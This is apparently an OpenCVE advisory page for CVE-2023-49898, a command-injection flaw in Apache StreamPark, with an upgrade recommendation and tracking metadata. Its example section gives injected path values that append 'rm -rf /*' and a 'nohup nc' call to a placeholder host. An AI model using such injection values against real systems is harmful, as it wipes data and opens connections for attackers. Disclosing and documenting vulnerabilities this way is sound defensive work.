Mitigation:
all users should upgrade to 2.1.2
Example:
##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&":
/usr/share/java/maven-3/conf/settings.xml || rm -rf /*
/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &
Analysis and contextual insights are available on OpenCVE Cloud.
No vendor fix or workaround currently provided.
Additional remediation guidance may be available on OpenCVE Cloud.
Tracking
Sign in to view the affected projects.
| Source | ID | Title |
|---|---|---|
Github GHSA |
GHSA-qg44-xqwj-wc28 | Apache StreamPark: Authenticated system users could trigger remote command execution |
No history.
Status: PUBLISHED
Assigner: apache
Published:
Updated: 2024-08-02T22:09:49.388Z
Reserved: 2023-12-01T03:12:29.421Z
Link: CVE-2023-49898
No data.
Status : Modified
Published: 2023-12-15T13:15:07.330
Modified: 2026-06-17T06:36:40.810
Link: CVE-2023-49898
No data.
OpenCVE Enrichment
No data.
-
CWE-77
Improper Neutralization of Special Elements used in a Command ('Command Injection')
Github GHSA